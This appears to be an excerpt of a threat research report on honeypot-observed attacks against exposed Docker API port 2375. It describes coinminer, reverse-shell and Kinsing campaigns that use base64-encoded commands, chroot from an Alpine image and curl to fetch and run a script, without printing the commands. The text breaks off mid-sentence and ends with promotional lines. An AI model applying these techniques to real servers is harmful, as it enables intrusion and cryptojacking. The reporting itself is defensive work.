Uptycs researchers identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API.
The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API port 2375. The attacks are related to crypto miners and reverse shells on the vulnerable servers using base64-encoded commands in the cmdline, built to evade defense mechanisms. This article briefly discusses three types of attacks which we observed lately in our Docker honeypot.
- Coinminer attacks
- Reverse shell attacks
- Kinsing malware attacks
Case 1 – Coinminer Attacks
The coinminer attack chain involves several shell scripts to drop malicious components via deployment of legitimate Docker images on the vulnerable servers (the servers exposed to Docker API).
Malicious Shell Scripts Involved In The Campaign
The threat actors tried to run the Alpine Docker image with chroot command to gain full privileges on the vulnerable server host (a common misconfiguration). The attacker passed curl utility as an argument to the Alpine image which downloads and runs the malicious shell script (hash:
Cronb.sh (the miner script)
Securing Docker: The Attack and Defense Way
👇 Please Follow our LI page…
DISC InfoSec
#InfoSecTools and #InfoSectraining